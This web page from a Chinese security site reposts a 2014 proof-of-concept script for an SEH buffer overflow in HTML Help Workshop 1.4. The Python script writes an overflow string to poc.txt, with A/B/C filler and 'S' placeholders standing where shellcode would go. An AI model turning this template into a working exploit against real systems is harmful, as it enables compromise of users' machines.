首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HTML Help Workshop 1.4 - (SEH) Buffer Overflow
来源:facebook.com/moroccankingdom024 作者:Kingdom 发布时间:2014-09-01  
#----------------------------------------------------------------------------------------------------#
# Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow                                          #
# Date: August 24 2014                                                                               #
# Exploit Author: Moroccan Kingdom (MKD)                                                             #
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx  #                                     #
# Version: 1.4                                                                                       #
# Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit  (eng)                                         #
#----------------------------------------------------------------------------------------------------#
  
import subprocess,time
import sys,os
  
if os.name == "nt" :
   subprocess.call('cls', shell=True)
   os.system("color c")
else :
   subprocess.call('clear', shell=True)
  
time.sleep(1)
  
print '''
///////////////////////////////////////////////////////////////////////////////
/                               M.O.R.O.C.C.A.N                               /
/                                K.I.N.G.D.O.M                                /
/                                    [MKD]                                    /
/ CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom  /
/ To run this exploit Go to DOS and then go to the folder path program and    /
/ run this command : hc | exm : hcc.exe AAAABBBCCCSSS...           /
/////////////////////////////////////////////////////////////////////////////// '''
  
JNK = "A" * 284
NEH = "B" * 4                   
SEH = "C" * 4                
SHL = "S" * 400
  
POC = JNK + NEH + SEH + SHL
  
try :
   file = open("poc.txt", "w")
   file.write(POC)
   file.close()
   print "\n[*] file created successfully"
except:
   print "[#] error to create file"
   
close = raw_input("\n[!] press any button to close()")

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NRPE 2.15 Remote Command Execu
·IBM 1754 GCM KVM Multiple Vuln
·XRMS - Blind SQL Injection and
·Baidu Spark Browser v26.5.9999
·PhpWiki - Remote Command Execu
·Wing FTP Server Authenticated
·ActualAnalyzer Lite 2.81 - Una
·Android Browser Same Origin Po
·Plogger 1.0-RC1 - Authenticate
·Google Chrome 31.0 XSS Auditor
·Internet Explorer MS14-029 Mem
·LeapFTP 3.1.0 URL Handling Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved